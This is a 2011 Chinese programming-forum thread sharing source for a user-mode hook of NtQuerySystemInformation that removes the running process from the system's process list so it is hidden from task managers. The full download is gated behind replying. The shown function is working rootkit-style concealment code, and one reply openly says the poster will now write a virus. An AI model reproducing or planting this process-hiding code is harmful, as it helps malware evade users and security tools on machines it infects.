VC驿站

 找回密码
 加入驿站

QQ登录

只需一步,快速开始

搜索
查看: 36374|回复: 427

[交流] ring3 API HOOK隐藏进程源代码及DEMO

  [复制链接]
17_avatar_middle
最佳答案
0 
online_supermod 发表于 2011-5-18 20:57:15 | 显示全部楼层 |阅读模式
本帖最后由 Koma 于 2012-3-29 16:25 编辑

好久之前在gg找到的一份代码,有兴趣的看看!

部分代码:
ring3 API HOOK隐藏进程源代码及DEMO
  1. long __stdcall MyNtQuerySystemInformation(
  2.   DWORD SysInformatoinClass,
  3.   PVOID SystemInformation,         
  4.   ULONG SystemInformationLength,
  5.   PULONG ReturnLength OPTIONAL)
  6. {
  7.   long Result;

  8.   Result = ((PNTQUERYSYSTEMINFORMATION)(PROC)(*NtQuerySystemInformationHook))
  9.                  (SysInformatoinClass,SystemInformation,SystemInformationLength,ReturnLength);

  10.   //一定要使用结构化异常处理,否则就有可能出现异常对话框。
  11.   __try
  12.   {
  13.     if(SysInformatoinClass == 5 && Result == 0 /* STATUS_SUCCESS */)
  14.     {
  15.       PPROCESSINFO pProcessInfo;
  16.       PPROCESSINFO pPrevProcessInfo;

  17.       pProcessInfo = (PPROCESSINFO)SystemInformation;
  18.       pPrevProcessInfo = pProcessInfo;

  19.       while(true)
  20.       {
  21.         if(pProcessInfo != NULL && pProcessInfo->dwProcessID == dwSelfProcessID)
  22.         {
  23.           if(pProcessInfo->dwOffset == 0)
  24.             pPrevProcessInfo->dwOffset = 0;
  25.           else
  26.             pPrevProcessInfo->dwOffset = pPrevProcessInfo->dwOffset + pProcessInfo->dwOffset;

  27.           break;
  28.         }

  29.         if(pProcessInfo->dwOffset == 0)
  30.           break;

  31.         pPrevProcessInfo = pProcessInfo;
  32.         pProcessInfo = (PPROCESSINFO)((byte*)pProcessInfo + pProcessInfo->dwOffset);
  33.       }
  34.     }
  35.   }
  36.   __except(EXCEPTION_EXECUTE_HANDLER)
  37.   {
  38.     /*/ 发生异常,但是不必做任何事
  39.     ::MessageBox(NULL,"Exception Occured at self-defined function :(",NULL,MB_OK | MB_ICONWARNING);
  40.     //*/
  41.   }

  42.   return Result;
  43. }
  44. //---------------------------------------------------------------------------
复制代码
源代码下载:
游客,如果您要查看本帖隐藏内容请回复

评分

参与人数 1 +5 收起 理由
90_avatar_small qijicxl + 5

查看全部评分





上一篇:来一本《Q版缓冲区溢出教程》
下一篇:socket用户异常掉线检测
91_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-18 22:58:49 | 显示全部楼层
不错不错,终于找到了
23_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-18 23:11:33 | 显示全部楼层
dingaaaaaaaaaaa
62_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-18 23:13:20 | 显示全部楼层
我也来下看。是否真隐藏
26_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-18 23:13:43 | 显示全部楼层
看看~ring3 API HOOK隐藏进程源代码及DEMO
45_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-18 23:26:48 | 显示全部楼层
回屋睡视同儿戏
82_avatar_middle
最佳答案
0 
online_vip 发表于 2011-5-19 06:31:22 | 显示全部楼层
哈哈,看下啊,研究下啊
90_avatar_middle
最佳答案
0 
online_supermod 发表于 2011-5-19 07:34:21 | 显示全部楼层
koma老大也要支持下
06_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-19 08:39:06 | 显示全部楼层
谢谢分享啊
12_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-19 08:40:07 | 显示全部楼层
下来学习一下
90_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-19 09:02:15 | 显示全部楼层
看看,学习下!
66_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-19 09:18:07 | 显示全部楼层

我也来下看。是否真隐藏
41_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-19 09:43:08 | 显示全部楼层
感谢分享。。。。。。。。。
07_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-19 09:58:59 | 显示全部楼层
  顶,支持LZ哦、
15_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-19 10:00:30 | 显示全部楼层
找了好久  不知道 是否真能 隐藏
36_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-19 10:07:39 | 显示全部楼层
很好啊,可惜还有点不懂,看看
06_avatar_middle
最佳答案
0 
online_vip 发表于 2011-5-19 10:24:34 | 显示全部楼层
学习收藏研究MyCcAsm.cAsm.c.Asm.........Asm.c...oo0
18_avatar_middle
最佳答案
0 
online_vip 发表于 2011-5-19 10:50:33 | 显示全部楼层
下载下来,学习一下
02_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-19 20:06:02 | 显示全部楼层
终于找到了,太好了,我要写病毒了。
92_avatar_middle
最佳答案
0 
在线会员 发表于 2011-5-19 20:39:46 | 显示全部楼层
好好学习下
您需要登录后才可以回帖 登录 | 加入驿站 qq_login

本版积分规则

×【发帖 友情提示】
1、请回复有意义的内容,请勿恶意灌水;
2、纯数字、字母、表情等无意义的内容系统将自动删除;
3、若正常回复后帖子被自动删除,为系统误删的情况,请重新回复其他正常内容或等待管理员审核通过后会自动发布;
4、感谢您对VC驿站一如既往的支持,谢谢合作!

关闭

站长提醒上一条 /2 下一条

QQ|小黑屋|手机版|VC驿站 ( 辽ICP备09019393号 )|网站地图wx_jqr

GMT+8, 2020-10-23 19:00

Powered by CcTry.CoM

© 2009-2020 cctry.com

快速回复 返回顶部 返回列表